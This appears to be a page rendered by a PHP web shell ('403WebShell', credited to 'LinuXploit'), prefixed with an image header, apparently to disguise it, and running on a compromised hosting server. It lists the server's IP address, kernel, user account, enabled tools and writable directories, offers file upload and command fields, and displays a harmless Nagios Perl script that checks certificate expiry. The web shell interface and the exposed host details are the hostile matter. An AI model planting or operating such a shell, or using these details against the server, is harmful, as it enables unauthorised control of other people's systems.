����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 3.131.13.149
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /lib64/nagios/plugins/extra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /lib64/nagios/plugins/extra/check_registries_certs
#!/usr/bin/env perl

use extreme;
use File::Slurp;
use Carp;
use Getopt::Long;
use Date::Parse;
use JSON 'decode_json';
use File::Temp;

my ( $path, $domain );
my $w = 15;
my $c = 7;
GetOptions(
    'path=s'   => \$path,
    'domain=s' => \$domain,
    'w=i'      => \$w,
    'c=i'      => \$c,
) or die("Error in command line arguments\n");

croak 'path is a required argument'   unless defined $path;
croak 'domain is a required argument' unless defined $domain;
croak 'path should be a directory'    unless -d $path;

my $config = "$path/config.json";
croak "Can't find $config" unless -f $config;

my $exit_code = 0;
my $time      = time();
$c = $c * 86400;
$w = $w * 86400;

sub get_registry_cert_expire {
    my $domain = shift;
    my $file   = shift;
    open( my $fh, "$path/certs/$file" )
      or die "Could not open file  '$path/certs/$file', $!";
    my $fullchain;
    while (<$fh>) {
        $fullchain .= $_ if ( /BEGIN CERTIFICATE/ .. /END CERTIFICATE/ );
    }
    my $temp_file = File::Temp->new();
    print $temp_file "$fullchain";
    $fullchain = '';
    my $certs = `keytool -printcert -file $temp_file  2>/dev/stdout`;
    my %certs;

    my $crt = '';
    for my $line ( split /\n/, $certs ) {
        $crt = $1 if $line =~ m/^Certificate\[(\d)\]/;
        next unless $crt;
        $certs{$crt}{$1} = $' if $line =~ m/^(Owner|Valid from):\s?/;

        # cn regex
        if (   $certs{$crt}{Owner}
            && $certs{$crt}{'Valid from'} )
        {
            next if $certs{$crt}{Owner} !~ m/CN=($domain)/i;
            my $date        = $' if $certs{$crt}{'Valid from'} =~ m/ until: /;
            my $expire_time = str2time($date);
            return $expire_time;
        }
    }
    return;
}

sub message {
    my $expire = shift;
    my $reg    = shift;
    my $suf
      = "will expire in " . int( ( $expire - $time ) / 86400 ) . " days";
    if ( $expire < $time ) {
        $suf = "expired " . int( ( $time - $expire ) / 86400 ) . " days ago";
    }
    my $msg = "Certificate for registry '$reg' $suf";
    return $msg;
}

# parse rtkProperties
my $data_raw = read_file($config);
my $data     = decode_json($data_raw);
foreach my $key ( sort keys %{$data} ) {
    my $registry = $data->{$key}{'name'};
    my $cert     = "$registry/$data->{$key}{'poolName'}.pem";
    $cert = "$registry/default.pem" if !$data->{$key}{'poolName'};
    my $expire = get_registry_cert_expire( $domain, $cert );

    if ( !$expire ) {
        $exit_code = 3;
        say "Cannot get expire date cert $path/certs/$cert for registry $key";
    }
    elsif ( $expire - $time < $w ) {
        $exit_code = 1 if $exit_code < 2;
        say message( $expire, "$key" );
    }
    elsif ( $expire - $time < $c ) {
        $exit_code = 2 if $exit_code < 3;
        say message( $expire, "$key" );
    }
}

say 'Certificates OK' unless $exit_code;
exit $exit_code;

Youez - 2016 - github.com/yon3zu
LinuXploit